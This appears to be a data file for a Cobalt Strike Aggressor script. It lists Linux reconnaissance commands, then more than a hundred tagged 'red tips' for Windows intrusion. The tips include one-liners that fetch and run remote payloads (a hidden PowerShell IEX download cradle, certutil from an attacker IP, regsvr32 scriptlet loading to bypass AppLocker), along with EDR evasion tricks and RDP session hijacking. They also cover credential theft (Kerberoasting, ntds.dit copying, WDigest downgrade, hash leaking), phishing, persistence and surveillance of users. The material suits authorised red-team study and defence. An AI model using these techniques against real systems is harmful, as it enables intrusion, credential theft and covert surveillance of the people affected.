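%(cmd => 'ls /boot | grep vmlinuz-', desc => 'Verify the name of the specific version of the kernel', tags => @(
'linux', 'ls', 'grep', 'vmlinuz-', 'kernel'
)
),
%(cmd => 'lsb_release -a', desc => 'Display information about your specific Linux distribution', tags => @(
'linux', 'lsb_release', 'LSB', 'distro'
)
),
%(cmd => 'last -a', desc => 'Show the users who logged in last', tags => @(
'linux', 'last', 'login', 'log'
)
),
%(cmd => 'uname -a/-mrs', desc => 'Display the software and hardware information in current running Linux system', tags => @(
'linux', 'uname', 'software', 'hardware', 'system'
)
),
%(cmd => 'id', desc => 'Print user and group information for the specified USERNAME, or (when USERNAME omitted) for the current user', tags => @(
'linux', 'id', 'user', 'group', 'username'
)
),
%(cmd => 'history', desc => 'Show the last commands entered for the current user', tags => @(
'linux', 'history', 'last', 'commands', 'user'
)
),
%(cmd => 'arp -a', desc => 'Display the current arp table', tags => @(
'linux', 'arp', 'table', 'MAC'
)
),
%(cmd => 'netstat -anot', desc => 'Display network connections', tags => @(
'linux', 'net', 'stat', 'TCP', 'UDP', 'connections'
)
),
%(cmd => 'ps -elf', desc => 'View information on a selection of running processes', tags => @(
'linux', 'ps', 'elf', 'processes', 'monitor', 'status'
)
),
%(cmd => 'ps -elf | grep root', desc => 'View information on a selection of running processes owned by root', tags => @(
'linux', 'ps', 'elf', 'root', 'processes', 'monitor'
)
),
%(cmd => 'ls -la /var/www/html/', desc => 'List the contents of html directory for web resources', tags => @(
'linux', 'ls', '/var/www/html', 'web', 'html', 'listing'
)
),
%(cmd => 'service apache2 status', desc => 'View status of apache2 service', tags => @(
'linux', 'apache2', 'service', 'status', 'web'
)
),
%(cmd => 'cat /etc/resolv.conf', desc => 'View the DNS entries for your Linux distro', tags => @(
'linux', 'cat', 'etc', 'resolv.conf', 'DNS', 'distro'
)
),
%(cmd => 'cat /etc/networks', desc => 'View Linux network configuration', tags => @(
'linux', 'cat', 'etc', 'networks', 'config'
)
),
%(cmd => 'iptables -L', desc => 'Display all iptables rules', tags => @(
'linux', 'iptables', 'networking', 'rules', 'ACL'
)
),
%(cmd => 'iptables -L -t nat', desc => 'Display all natting iptables rules', tags => @(
'linux', 'iptables', 'nat', 'rules', 'ACL'
)
),
%(cmd => 'lsof -i', desc => 'List the files that are open by which process', tags => @(
'linux', 'lsof', 'list', 'files', 'process', 'open'
)
),
%(cmd => 'cat /etc/services', desc => 'View services that client applications use', tags => @(
'linux', 'cat', 'etc', 'services', 'client', 'applications'
)
),
%(cmd => 'grep 80 /etc/services', desc => 'View services that utilize port 80', tags => @(
'linux', 'grep', '80', 'web', 'services', 'port'
)
),
%(cmd => 'w', desc => 'Display who is logged into the Linux and Unix-like server, and what they are doing at command execution time', tags => @(
'linux', 'w', 'logged', 'login', 'command', 'execution'
)
),
%(cmd => 'route -n', desc => 'Display the route table for Linux/Debian based systems', tags => @(
'linux', 'route', '-n', 'routing', 'network', 'recon'
)
),
%(cmd => 'cat /etc/passwd', desc => 'Display the contents of /etc/passwd', tags => @(
'linux', 'cat', 'etc', 'passwd', 'password', 'recon'
)
),
%(cmd => 'cat /etc/passwd | awk -F : \'{if (\$3 > 999 && \$3 < 60001) print \$1,\$3,\$6}\'', desc => 'Display only users of /etc/passwd', tags => @(
'linux', 'cat', 'etc', 'passwd', 'awk', 'regex', 'password', 'recon'
)
),
%(cmd => 'cat /etc/motd', desc => 'Display the message of the day for any sensitive info', tags => @(
'linux', 'cat', 'etc', 'motd', 'information', 'recon'
)
),
%(cmd => 'cat /etc/group', desc => 'Display the groups in /etc/group', tags => @(
'linux', 'cat', 'etc', 'group', 'recon'
)
),
%(cmd => 'cat /etc/shadow', desc => 'Display the password hashes (Must be root)', tags => @(
'linux', 'cat', 'etc', 'shadow', 'password', 'hashes', 'recon'
)
),
);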
@tips = @(
%(tips => 'Use the built in net commands with Beacon! [help net]', tags => @(
'net', 'networking', 'config', 'utility', 'recon', 'enum', 'domain', 'display'
)
),
%(tips => 'Run C:\\Windows\\System32\\gatherNetworkInfo.vbs script and check results inside C:\\Windows\\System32\\Config', tags => @(
'vbscript', 'networking', 'config', 'utility', 'recon', 'enum', 'script'
)
),
%(tips => 'RunDll32.exe user32.dll,LockWorkStation - Locks a users workstation', tags => @(
'rundll32', 'lock', 'workstation', 'user', 'effects'
)
),
%(tips => 'dir /s /h:a *.* - displays all hidden files', tags => @(
'dir', 'display', 'hidden', 'files', 'listing'
)
),
%(tips => 'netsh interface portproxy add v4tov4 listenport=port listenaddress=IP connectaddress=remote_ip connectport=remote_port - setup reverse port proxy on windows as a pivot', tags => @(
'netsh', 'portproxy', 'pivot', 'networking', 'interface'
)
),
%(tips => 'icacls \<file_name\> /grant \<username\>:F - grants full control permissions', tags => @(
'icacls', 'permissions', '', 'user', 'effects'
)
),
%(tips => 'regsvr32.exe /u /n /s /i:http://ip/payload.sct scrobj.dll - bypass Applocker or code execution restrictions, using regsvr32 as a one-liner', tags => @(
'regsvr32', 'one-liner', 'scrobj.dll', 'bypass', 'native', 'delivery'
)
),
%(tips => 'SystemInfo /s computername - gets remote system info', tags => @(
'systeminfo', 'computer', 'system', 'recon', 'info', 'enum'
)
),
%(tips => 'Need a map of the network? Run Bloodhound or SharpHound for faster polling!!', tags => @(
'network', 'map', 'topology', 'BloodHound', 'SharpHound'
)
),
%(tips => 'Always check sysvols!! Domain Controllers will have them, most sysvols are viewable by normal users.', tags => @(
'sysvol', 'domain controller', 'enum', 'recon', 'scripts', 'share'
)
),
%(tips => 'net user a specific user and see if they are executing any logon scripts, those might contain juicy information.', tags => @(
'net', 'user', 'recon', 'enum', 'logon', 'scripts'
)
),
%(tips => 'Always check Desktops/Documents/Downloads/Favorites folders for trails of valuable information left behind.', tags => @(
'folders', 'information', 'recon', 'enum', 'users'
)
),
%(tips => 'Find those Fileservers! Sysadmins leave behind all kinds of goodies there. Great for lateral movement as well.', tags => @(
'server', 'fileserver', 'sysadmin', 'lateral movement', 'enum', 'recon'
)
),
%(tips => 'Use certutil.exe -urlcache -split -f [http://AttackerIP/RemoteFile] to download a file to the target machine.', tags => @(
'certutil', 'urlcache', 'one-liner', 'download', 'web', 'delivery'
)
),
%(tips => 'The all powerful one-liner powershell.exe -w hidden -nop -ep bypass -c \"IEX ((new-object net.webclient).downloadstring(\'http://[domainname|IP]:[port]/[file]\'))\"', tags => @(
'powershell', 'one-liner', 'web-delivery', 'web', 'delivery', 'download'
)
),
%(tips => 'Use tasklist /S [RemoteComputer] /SVC to see if you have access to that remote machine.', tags => @(
'tasklist', 'remote', 'authentication', 'list', 'processes'
)
),
%(tips => 'Enable RDP through the registry: reg add “HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f', tags => @(
'RDP', 'registry', 'config', 'windows', 'regedit'
)
),
%(tips => 'Please wrap/encode/pack your payloads if you have to drop to disk! - use veil/upx/Invoke-Obfuscation/In-Memory type of payloads', tags => @(
'pack', 'wrap', 'encode', 'upx', 'veil', 'payload', 'Invoke-Obfuscation'
)
),
%(tips => 'Try to stay in memory and avoid putting files on disk. (powershell-import)', tags => @(
'Memory', 'inject', 'fileless', 'payload', 'files'
)
),
%(tips => 'Live off the land!! Use what is on the target, native windows binaries are very powerful! (ex. forfiles, rundll32)', tags => @(
'native', 'windows', 'binaries', '', 'processes'
)
),
%(tips => 'Use AD naming schemes to your advantage, sysadmins are lazy and use organization to help them with all the IT work they do on a daily basis.', tags => @(
'AD', 'schemes', 'sysadmins', 'IT', 'naming'
)
),
%(tips => 'Enterprise Admins will almost always have the rights to move laterally to those foreign domain controllers, 9 times out of 10 they use the same password!', tags => @(
'admins', 'enterprise', 'AD', 'password', 'lateral movement', 'pivot'
)
),
%(tips => 'Invoke-NinjaCopy.ps1 is super powerful and should be used to grab the ntds.dit and SYSTEM files for offline cracking.', tags => @(
'Invoke-NinjaCopy', 'powershell', 'ntds.dit', 'SYSTEM', 'password', 'cracking'
)
),
%(tips => 'Have multiple points of presence on a network for longer engagements. Persistence can go a long way for Security Operations.', tags => @(
'persistence', 'presence', 'foothold', 'network', 'operations', 'security'
)
),
%(tips => 'cmd.exe and powershell.exe blocked by GPO? Find a process that is user owned and started on bootup for process injection to bypass that. Try forfiles as well.', tags => @(
'cmd', 'powershell', 'GPO', 'list', 'injection', 'forfiles', 'bypass'
)
),
%(tips => 'Just because you acquired initial access does not mean you stop doing recon. Network/Host Enumeration is always the most important part.', tags => @(
'initial', 'recon', 'enum', 'network', 'host', 'harvesting'
)
),
%(tips => 'Invoke-ReverseDnsLookup.ps1 of powersploit finds those machines on the network that has DNS records and can provide more SA for an attacker.', tags => @(
'powershell', 'powersploit', 'network', 'machine', 'DNS', 'awareness', 'recon', 'enum'
)
),
%(tips => 'Need a Temporary web server? Use Python! python -m SimpleHTTPServer [port]', tags => @(
'web', 'server', 'python', 'http', 'services'
)
),
%(tips => 'Red Tip #1: Profile your victim and use their user agent to mask your traffic. Alternatively use UA from software such as Outlook.', tags => @(
'redtip', '#1', 'user agent', 'outlook', 'traffic'
)
),
%(tips => 'Red tip #2: If the enemy SOC is using proxy logs for analysis. Guess what? It wont log cookies or POST body content as can be sensitive.', tags => @(
'redtip', '#2', 'SOC', 'proxy', 'analysis', 'logs', 'cookies'
)
),
%(tips => 'Red tip #3: Taking a snapshot of AD can let you browse, explore and formulate future attacks if access is lost momentarily.', tags => @(
'redtip', '#3', 'snapshot', 'AD', 'attacks'
)
),
%(tips => 'Red tip #4: consider using Office Template macros and replacing normal.dot for persistence in VDI environments.', tags => @(
'redtip', '#4', 'Office', 'macros', 'persistence', 'VDI'
)
),
%(tips => 'Red tip #5: Do a DNS lookup for terms such as intranet, sharepoint, wiki, nessus, cyberark and many others to start intel on your target.', tags => @(
'redtip', '#5', 'DNS', 'recon', 'enum'
)
),
%(tips => 'Red tip #6: Got access but need to find target? Use WMIC to query and dump the DNS Zone for a better view of assets - https://serverfault.com/questions/550385/export-all-hosts-from-dns-manager-using-powershell', tags => @(
'redtip', '#6', 'wmic', 'DNS', 'assets'
)
),
%(tips => 'Red tip #7: Whether PSEXEC, WMI, PS remoting or even the recent COM execution technique for lateral movement. Dont forget beloved RDP.', tags => @(
'redtip', '#7', 'PSEXEC', 'WMI', 'powershell', 'COM', 'RDP'
)
),
%(tips => 'Red tip #8: Make sure theres trackers in your: emails, delivery server and payload execution. Any more? Comment to share!', tags => @(
'redtip', '#8', 'emails', 'delivery', 'payload'
)
),
%(tips => 'Red tip #9: When PowerUp yields no results, dont forget SysInternals AutoRuns. Often you can find unexpected surprises :)', tags => @(
'redtip', '#9', 'PowerUp', 'sysinternals', 'AutoRuns'
)
),
%(tips => 'Red tip #10: When using BloodHound, dont forget DA equivalents such as administrators and server operators etc too. These arent mapped.', tags => @(
'redtip', '#10', 'BloodHound', 'DA', 'groups', 'mapping'
)
),
%(tips => 'Red tip #11: When navigating mature environments, a good old network diagram along with AD OUs can help to shed some light into next steps.', tags => @(
'redtip', '#11', 'topology', 'network', 'AD', 'OU', 'lateral movement'
)
),
%(tips => 'Red tip #12: Kerberoast them hashes, could be a fast route to domain administrator. PowerView: Invoke-Kerberoast -Format Hashcat', tags => @(
'redtip', '#12', 'Kerberoast', 'hashes', 'services', 'powershell', 'DA'
)
),
%(tips => 'Red tip #13: Shared local administrator account hashes are great for lateral movement. Find machines based on the same build and attack away', tags => @(
'redtip', '#13', 'administrator', 'account', 'hashes', 'lateral movement', 'machines'
)
),
%(tips => 'Red tip #14: Got extra credentials? Use different sets for separate egress channels so that if one account is disabled all the rest are ok.', tags => @(
'redtip', '#14', 'credentials', 'egress', 'channels', 'account'
)
),
%(tips => 'Red tip #15: You dont need payloads when you can phish credentials and login to Citrix, VPN, email with no 2FA. Check the perimeter.', tags => @(
'redtip', '#15', 'phish', 'payload', 'Citrix', 'VPN', 'email'
)
),
%(tips => 'Red tip #16: @dafthack MailSniper, @domchell LyncSniper can be a useful but noisy way to obtain AD credentials into an organization.', tags => @(
'redtip', '#16', 'AD', 'credentials', 'organization'
)
),
%(tips => 'Red tip #17: @_staaldraad Ruler tool can be used to obtain code execution on a system running Outlook if you can access exchange externally', tags => @(
'redtip', '#17', 'Ruler', 'Outlook', 'code', 'execution', 'exchange'
)
),
%(tips => 'Red tip #18: When tools like MailSniper dont work in custom environments, you still have good old @Burp_Suite to replicate the attacks', tags => @(
'redtip', '#18', 'burpsuite', 'burp', 'MailSniper'
)
),
%(tips => 'Red tip #19: Need a DC? echo %LOGONSERVER%. Need a list? nltest /dclist, nslookup -q=srv _kerberos._tcp (domain suffix can autocomplete)', tags => @(
'redtip', '#19', 'DC', 'LOGONSERVER', 'nltest', 'nslookup', 'kerberos'
)
),
%(tips => 'Red tip #20: So apparently not many people use SSH for redirector setup. So try out SSH c2 -R *:80:localhost:80. SSH config GatewayPorts yes', tags => @(
'redtip', '#20', 'SSH', 'redirector', 'c2', 'config'
)
),
%(tips => 'Red tip #21: Found open user home shares that are accessible? See if you can drop into Startup Programs for lateral movement and privesc.', tags => @(
'redtip', '#21', 'shares', 'user', 'startup', 'privesc', 'lateral movement'
)
),
%(tips => 'Red tip #22: Use VNC, microphone and webcam to perform surveillance. Netstat, tasklist can provide context into what the users doing.', tags => @(
'redtip', '#22', 'VNC', 'microphone', 'webcam', 'netstat', 'tasklist'
)
),
%(tips => 'Red tip #23: Stash payloads in C:$Recycle.Bin', tags => @(
'redtip', '#23', 'payload', 'C:', 'Recycle Bin'
)
),
%(tips => 'Red tip #24: Compromise the SOC and Security teams to watch their progress and track their email alerts for sophisticated threats', tags => @(
'redtip', '#24', 'SOC', 'Security', 'email', 'phish', 'alerts'
)
),
%(tips => 'Red tip #25: Probably dont do this on a red team, but spray for Welcome1, Password1 if youre struggling to move. But move off fast.', tags => @(
'redtip', '#25', 'password', 'spray', 'cracking'
)
),
%(tips => 'Red tip #26: Split your campaigns up so that they are independent. Fire tons at once for decoys and to burn out the defense.', tags => @(
'redtip', '#26', 'campaign', 'fire', 'defense'
)
),
%(tips => 'Red tip #27: Need more credentials? Search for passwords on Sharepoint, and intranet.', tags => @(
'redtip', '#27', 'credentials', 'password', 'Sharepoint', 'intranet'
)
),
%(tips => 'Red tip #28: Look for asset registers to understand who owns what machine, make and model. Theres usually an asset label to host name too!', tags => @(
'redtip', '#28', 'asset', 'machine', 'host'
)
),
%(tips => 'Red tip #29: Lateral movement: printers, open webroots, good old Tomcat, what are your quick wins?', tags => @(
'redtip', '#29', 'lateral movement', 'printers', 'webroots', 'tomcat'
)
),
%(tips => 'Red tip #30: Get AD credentials? Turn up on site and you might be able to use them to login to Corporate Wifi :)', tags => @(
'redtip', '#30', 'AD', 'credentials', 'site', 'login', 'wifi'
)
),
%(tips => 'Red tip #31: Hunting e-mails and network shares for penetration testing reports can often yield good results.', tags => @(
'redtip', '#31', 'emails', 'network', 'shares', 'reports'
)
),
%(tips => 'Red tip #32: List mounts: net use, look for shared folders and drop a UNC icon LNK into it. Run Inveigh or Wireshark on host to grab hashes.', tags => @(
'redtip', '#32', 'mount', 'list', 'net', 'shared', 'folders', 'LNK', 'Inveigh', 'Wireshark'
)
),
%(tips => 'Red tip #33: Orgs are transitioning to cloud services such as AWS, Beanstalk, O365, Google Apps. 2FA is vital - password reset to compromise.', tags => @(
'redtip', '#33', 'cloud', 'services', 'AWS', 'O365', 'password', 'Apps'
)
),
%(tips => 'Red tip #34: OpSec. Set notifications to your phone for logins or intrusion attempts in any part of your attack infrastructure.', tags => @(
'redtip', '#34', 'Opsec', 'notification', 'phone', 'login', 'infrastructure'
)
),
%(tips => 'Red tip #35: FireEye sandbox flagging your payloads? Try anti sandbox techniques! If not, just use HTA to get into memory as it doesnt scan', tags => @(
'redtip', '#35', 'FireEye', 'sandbox', 'payload', 'HTA', 'memory'
)
),
%(tips => 'Red tip #36: Dont forget the good old GPP passwords in SYSVOL. There may be cached GPP on the machine. Applying the patch isnt enough', tags => @(
'redtip', '#36', 'GPP', 'password', 'SYSVOL', 'machine', 'patch'
)
),
%(tips => 'Red tip #37: Use GenHTA to generate HTA files that use anti-sandboxing techniques. https://github.com/vysec/GenHTA', tags => @(
'redtip', '#37', 'GenHTA', 'HTA', 'files', 'sandbox'
)
),
%(tips => 'Red tip #38: Having trouble getting @armitagehacker CobaltStrikes evil.hta through defenses? https://github.com/vysec/MorphHTA', tags => @(
'redtip', '#38', 'CobaltStrike', 'HTA', 'morphHTA'
)
),
%(tips => 'Red tip #39: If emails get bounced, read the email! Sometimes due to malware scanners, spam etc. Or you may even get an out of office reply.', tags => @(
'redtip', '#39', 'email', 'malware', 'scanner', 'spam'
)
),
%(tips => 'Red tip #40: @0x09AL suggests looking for default credentials on printers and embedded devices. Move off initial foothold using this.', tags => @(
'redtip', '#40', 'credentials', 'printers', 'devices', 'foothold'
)
),
%(tips => 'Red tip #41: @Oddvarmoe suggests using Alternate Data Streams if you need to put a file on disk. For example https://github.com/samratashok/nishang/blob/master/Backdoors/Invoke-ADSBackdoor.ps1', tags => @(
'redtip', '#41', 'ADS', 'Data', 'Streams', 'file', 'disk'
)
),
%(tips => 'Red tip #42: Got OS level access to a middle tier? Task list, netstat and wmic process list full | findstr /I commandline for more ideas!', tags => @(
'redtip', '#42', 'OS', 'access', 'tier', 'wmic', 'process', 'list', 'findstr'
)
),
%(tips => 'Red tip #43: So you know where the server application files are. Download the binaries and check out configuration files for conn. strings', tags => @(
'redtip', '#43', 'server', 'files', 'application', 'binaries', 'config'
)
),
%(tips => 'Red tip #44: Run PEiD and other packer / technology checkers to find out the language and packer used on downloaded server binaries.', tags => @(
'redtip', '#44', 'PEiD', 'packer', 'language', 'binaries'
)
),
%(tips => 'Red tip #45: Run strings on the application binary for potentially other cleartext sensitive strings! (Unicode mode too)', tags => @(
'redtip', '#45', 'strings', 'application', 'binary', 'cleartext'
)
),
%(tips => 'Red tip #46: On a VDI? Check out C:\ and other disks for potentially sensitive files other users may have saved there.', tags => @(
'redtip', '#46', 'VDI', 'C:', 'disks', 'sensitive', 'files'
)
),
%(tips => 'Red tip #47: Incase EDR are looking for "net users /domain" try using "net use /dom"', tags => @(
'redtip', '#47', 'EDR', 'net', 'users', 'domain', 'dom'
)
),
%(tips => 'Red tip #48: Is EDR potentially looking for "powershell -encodedcommand"? Try "powershell -ec"', tags => @(
'redtip', '#48', 'EDR', 'powershell', 'encoded', 'command'
)
),
%(tips => 'Red tip #49: Attacking a heavy Macintosh or Linux estate? Send a Office Maldoc with OS checking logic to obtain footholds on either system', tags => @(
'redtip', '#49', 'Mac', 'linux', 'Office', 'OS', 'foothold'
)
),
%(tips => 'Red tip #50: Carbon Black checks for IEX and web req commands. Use powershell "powershell . (nslookup -q=txt calc.vincentyiu.co.uk )[-1]"', tags => @(
'redtip', '#50', 'Carbon Black', 'IEX', 'web', 'powershell'
)
),
%(tips => 'Red tip #51: Cant open C drive? Try \127.0.0.1\c$', tags => @(
'redtip', '#51', 'C:', '127.0.0.1', 'c$'
)
),
%(tips => 'Red tip #52: SC doesnt take credentials. Cant use runas? Try net use \targetip\ipc$ password /u:domain\username then sc to psexec', tags => @(
'redtip', '#52', 'SC', 'credentials', 'runas', 'target', 'ip', 'password', 'domain', 'psexec'
)
),
%(tips => 'Red tip #53: When stick phishing for 2FA, consider using @mrgretzky Evilginx project which logs cookies. https://breakdev.org/evilginx-1-1-release/', tags => @(
'redtip', '#53', 'phishing', 'evilginx', 'logs', 'cookies'
)
),
%(tips => 'Red tip #54: Hide from blue. Volume shadow copy then execute \?\GLOBALROOT\Device\HarddiskVolumeShadowColy1\malware.exe/dll then delete VSC', tags => @(
'redtip', '#54', 'hidden', 'VSS', 'shadow', 'copy', 'execute', 'VSC'
)
),
%(tips => 'Red tip #55: SMB hash leaking using a UNC path for image in page for drive by leak can give you credentials for less mature environments.', tags => @(
'redtip', '#55', 'SMB', 'hash', 'UNC', 'credentials'
)
),
%(tips => 'Red tip #56: Target victims using email authentication such as Microsoft Account on Windows 10? Hash leak exposes full email address!', tags => @(
'redtip', '#56', 'target', 'email', 'authentication', 'microsoft', 'windows'
)
),
%(tips => 'Red tip #57: Working in teams yields better results; and best of all Makes Offensive operations more fun and keeps the adrenaline pumping', tags => @(
'redtip', '#57', 'team', 'operations', 'red'
)
),
%(tips => 'Red tip #58: Discuss business targets and objectives with your clients. This process should set non technical goals such as "ATM spit money"', tags => @(
'redtip', '#58', 'business', 'targets', 'objectives', 'client', 'goals'
)
),
%(tips => 'Red tip #59: Checking whether a server or host is good for egress? Likely to go down? "systeminfo | findstr /i boot"', tags => @(
'redtip', '#59', 'server', 'host', 'egress', 'systeminfo'
)
),
%(tips => 'Red tip #60: Type "query user" to see who else is connected to the machine.', tags => @(
'redtip', '#60', 'query', 'user', 'machine'
)
),
%(tips => 'Red tip #61: Get a quick patch list using wmic qfe list brief. Cross ref KB to bulletins.', tags => @(
'redtip', '#61', 'patch', 'wmic', 'qfe', 'KB'
)
),
%(tips => 'Red tip #62: Found a process of interest? Dont forget to obtain a MiniDump! Use Out-MiniDump https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1', tags => @(
'redtip', '#62', 'process', 'Minidump', 'powershell'
)
),
%(tips => 'Red tip #63: Finally in CyberArk, click policies and see safes but no account? Go to accounts search and search for empty and safes show up', tags => @(
'redtip', '#63', 'CyberArk', 'policies', 'account'
)
),
%(tips => 'Red tip #64: Is WebDav allowed through the gateway? Using http mini redirector? Dont exfiltrate or send in files. WebDav is subject to DLP', tags => @(
'redtip', '#64', 'webdav', 'gateway', 'http', 'redirector', 'DLP'
)
),
%(tips => 'Red tip #65: WebDav mini http redirector: net use * http://totallylegit.com/share . Then start z:', tags => @(
'redtip', '#65', 'webdav', 'mini', 'http', 'redirector'
)
),
%(tips => 'Red tip #66: Found potential MQ creds? ActiveMQ? Try out https://github.com/fmtn/a , works to query MQ endpoints that dont use self signed crt', tags => @(
'redtip', '#66', 'MQ', 'credentials', 'endpoints', 'crt'
)
),
%(tips => 'Red tip #67: Use vssadmin to list and create volume shadow copies', tags => @(
'redtip', '#67', 'vssadmin', 'list', 'volume', 'shadow'
)
),
%(tips => 'Red tip #68: Pivoting into a secure zone that has no DNS or web gateway and need exfil? Netsh port forward pivot UDP 53 to DNS 53 then boom', tags => @(
'redtip', '#68', 'pivot', 'DNS', 'web', 'gateway', 'UDP', 'exfil'
)
),
%(tips => 'Red tip #69: Have blue hidden the ways including winkey+R? Try shift and right click desktop and open command prompt', tags => @(
'redtip', '#69', 'hidden', 'blue', 'winkey', 'command', 'prompt'
)
),
%(tips => 'Red tip #70: Tracked down that putty session? Popped the box? Query user and check the victims logon time and idle times', tags => @(
'redtip', '#70', 'putty', 'session', 'Query', 'user', 'logon', 'time'
)
),
%(tips => 'Red tip #71: Hijack his Session using sc create sesshijack binpath= "cmd.exe /k tscon /dest:" then use putty session', tags => @(
'redtip', '#71', 'session', 'sc', 'hijack', 'putty', 'cmd.exe'
)
),
%(tips => 'Red tip #72: Most people understand email sec wrong. SPF does not mean not spoofable. SPF does nothing without DMARC.', tags => @(
'redtip', '#72', 'email', 'SPF', 'DMARC'
)
),
%(tips => 'Red tip #73: Weak DMARC on victim org domain? Spoof their own emails back into themselves! You even inherit their AD name and photo', tags => @(
'redtip', '#73', 'DMARC', 'domain', 'spoof', 'emails', 'AD'
)
),
%(tips => 'Red tip #74: Got access to Microsoft OWA mailbox or O365? You can extract global catalog from contacts use @Burp_Suite and parse JSON object', tags => @(
'redtip', '#74', 'access', 'microsoft', 'OWA', 'mailbox', 'O365', 'burpsuite'
)
),
%(tips => 'Red tip #75: Write PHP delivery scripts that can mutate your payloads and add unique trackers per download. This tracks file being executed', tags => @(
'redtip', '#75', 'PHP', 'delivery', 'scripts', 'payload', 'download', 'files'
)
),
%(tips => 'Red tip #76: Simulating a criminal threat story with smash and grab agenda? Phish users and hot swap payload mid campaign to test formats', tags => @(
'redtip', '#76', 'criminal', 'agenda', 'phish', 'users', 'campaign'
)
),
%(tips => 'Red tip #77: RCE on a web application for less mature client? nslookup -q=srv _ldap._tcp if its domain joined Invoke-Kerberoast', tags => @(
'redtip', '#77', 'RCE', 'web', 'application', 'client', 'nslookup', 'domain', 'kerberoast'
)
),
%(tips => 'Red tip #78: @benichmt1 suggests looking for vmdk files across the network. You can use this to potentially access segregated networks', tags => @(
'redtip', '#78', 'vmdk', 'files', 'network', 'access'
)
),
%(tips => 'Red tip #79: Obfuscation is never bad, especially when its a button click. @danielhbohannon - https://github.com/danielbohannon', tags => @(
'redtip', '#79', 'Obfuscation', 'danielbohannon'
)
),
%(tips => 'Red tip #80: Need to sweep for uptimes? Use wmic /node:"" OS get LastBootUpTime in a for loop', tags => @(
'redtip', '#80', 'uptime', 'wmic', 'OS'
)
),
%(tips => 'Red tip #81: Looking for systems running KeePass? Run a for loop on wmic /node:"host" process list brief :) then look at RT #82', tags => @(
'redtip', '#81', 'systems', 'KeePass', 'wmic', 'host', 'process', 'list'
)
),
%(tips => 'Red tip #82: Found KeePass running in memory? Use @harmj0y KeeThief to extract password and dl the KDBX - https://github.com/HarmJ0y/KeeThief', tags => @(
'redtip', '#82', 'KeePass', 'memory', 'harmj0y', 'KeeThief', 'password'
)
),
%(tips => 'Red tip #83: Struggling to find a working DB client? Live off the land and use your victims in an RDP session.', tags => @(
'redtip', '#83', 'DB', 'client', 'RDP', 'session'
)
),
%(tips => 'Red tip #84: Im sure everyone hates Oracle DB but no sweat, you can proxycap sqldeveloper.exe', tags => @(
'redtip', '#84', 'Oracle', 'DB', 'proxycap', 'sql'
)
),
%(tips => 'Red tip #85: Check the users calendars before using persistence on their machine. They may be out of office and screw your master plans.', tags => @(
'redtip', '#85', 'users', 'calendars', 'persistence', 'machine', 'office'
)
),
%(tips => 'Red tip #86: Red team and attack simulation is not penetration testing. You shouldnt be really testing anything, but simply infiltrating.', tags => @(
'redtip', '#86', 'red team', 'attack', 'testing', 'penetration'
)
),
%(tips => 'Red tip #87: @Oddvarmoe uses .UDL files to quickly launch a MSSQL connection test to validate credentials! https://blogs.msdn.microsoft.com/farukcelik/2007/12/31/basics-first-udl-test/', tags => @(
'redtip', '#87', 'UDL', 'files', 'MSSQL', 'credentials'
)
),
%(tips => 'Red tip #88: Dont forget Physical security! Whip up a PI with GSM and you can hack your way in by dropping the PI on network.', tags => @(
'redtip', '#88', 'Physical', 'security', 'PI', 'GSM', 'network'
)
),
%(tips => 'Red tip #89: regsvr32 SCT files are being detected as Squigglydoo. Looks for "script" case sensitive and "<registration" case insensitive.', tags => @(
'redtip', '#89', 'regsvr32', 'SCT', 'files', 'squigglydoo', 'script'
)
),
%(tips => 'Red tip #90: Cisco NGIPS is shit, when analysing traffic for havex it drops only but not', tags => @(
'redtip', '#90', 'Cisco', 'NGIPS', 'traffic', 'analysis'
)
),
%(tips => 'Red tip #91: Decoys can be as simple as burning egress by port scanning 1-1024 through IDS, or spamming dodgy emails at blocks of employees', tags => @(
'redtip', '#91', 'egress', 'port', 'scanning', 'IDS', 'emails'
)
),
%(tips => 'Red tip #92: If WDigest is disabled, reenable it for cleartext credentials before new users login with @harmj0y https://github.com/HarmJ0y/Misc-PowerShell/blob/master/Invoke-WdigestDowngrade.ps1', tags => @(
'redtip', '#92', 'wdigest', 'credentials', 'login'
)
),
%(tips => 'Red tip #93: Use Empyre to generate Macintosh and Linux payloads, modify it to contain code for Windows too! https://github.com/EmpireProject/EmPyre', tags => @(
'redtip', '#93', 'Empire', 'MAC', 'linux', 'payload', 'Empyre'
)
),
%(tips => 'Red tip #94: Client uses VDIs? Compromise underlying host and use Citrix Shadow Taskbar to spy on VDI sessions by selecting username', tags => @(
'redtip', '#94', 'VDI', 'Citrix', 'host'
)
),
%(tips => 'Red tip #95: @domchell recommends avoiding non persistent VDIs and persist on laptops. Query DC for live laptops.', tags => @(
'redtip', '#95', 'VDI', 'persistence', 'DC', 'laptop'
)
),
%(tips => 'Red tip #96: @lucasgates recommends using OLE objects containing VBS scripts instead of Macros as less suspicious. VBE will work too', tags => @(
'redtip', '#96', 'OLE', 'VBS', 'scripts', 'Macros', 'VBE'
)
),
%(tips => 'Red tip #97: Use recent critical vulnerabilities such as CVE-2017-0199 HTA handler issue to simulate real threats. https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/', tags => @(
'redtip', '#97', 'vulnerabilities', 'CVE', 'HTA'
)
),
%(tips => 'Red tip #98: @0x09AL suggests WordSteal. You can embed an IMAGE with UNC path to steal hashes from Word. Wont work if proxy. https://github.com/0x09AL/WordSteal', tags => @(
'redtip', '#98', 'WordSteal', 'image', 'UNC', 'word'
)
),
%(tips => 'Red tip #99: If client is using Proxy with WebDav you can phish creds using @ryHanson Phishery https://github.com/ryhanson/phishery', tags => @(
'redtip', '#99', 'client', 'Proxy', 'WebDav', 'phish', 'creds'
)
),
%(tips => 'Red tip #100: Use wgsidav if you need a quick WebDav server :) https://github.com/mar10/wsgidav', tags => @(
'redtip', '#100', 'wgsidav', 'webdav', 'server'
)
),
%(tips => 'Red tip #101: Set up red team infrastructure following @bluscreenofjeff guidelines! https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki', tags => @(
'redtip', '#101', 'red team', 'infrastructure', 'jeff', 'wiki'
)
),
%(tips => 'Red tip #102: Easier DNS redirector! https://pastebin.com/LNj4zjFs for opsec and not hosting C2 on the cloud', tags => @(
'redtip', '#102', 'DNS', 'redirector', 'opsec', 'c2'
)
),
%(tips => 'Red tip #103: Red team tips are useful but what makes the good red teamer is experience. Rack up that breadth of experience', tags => @(
'redtip', '#103', 'experience', 'tips'
)
),
